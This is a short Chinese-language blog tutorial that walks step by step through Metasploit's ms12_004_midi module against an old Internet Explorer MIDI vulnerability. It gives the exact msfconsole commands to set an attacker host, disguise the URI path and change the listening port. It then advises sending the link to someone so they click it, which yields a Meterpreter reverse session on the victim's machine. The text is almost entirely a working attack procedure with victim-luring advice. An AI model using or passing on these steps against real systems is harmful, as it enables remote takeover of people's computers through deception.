Metasploit之MIDI文件解析远程代码执行
本次漏洞利用的是ms12-004的IE漏洞
metasploit下进行操作
search 12-004 -->搜索漏洞相关模块,得到exploit/windows/browser/ms12_004_midi
use exploit/windows/browser/ms12_004_midi -->使用这个漏洞模块
show options -->查看设置选项
set SRVHOST 192.168.2.146 -->设置我们本机攻击者的IP
exploit -->生成exploit,得到http://192.168.2.146:8080/piu8OT,这个地址比较敏感,易被发现
set URIPATH / -->设置exploit的目录地址伪装
exploit -->再次生成exploit,这里会发现我们的原本默认端口4444可能会被占用
set LPORT 5555 -->改用5555端口监听
exploit -->最后一步生成exploit,地址:http://192.168.2.146:8080/
发送地址让别人去点击访问:http://192.168.2.146:8080/
我们的msf会得到一个会话,显示Successfully migrated to process我们就回车即可
然后查看我们的会话,并且打开开始利用相关命令进行shell渗透
sessions -->查看我们的会话
sessions -i id -->使用我们的会话,其中“id”为我们需要的会话数字ID
这样即可获得meterpreter
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论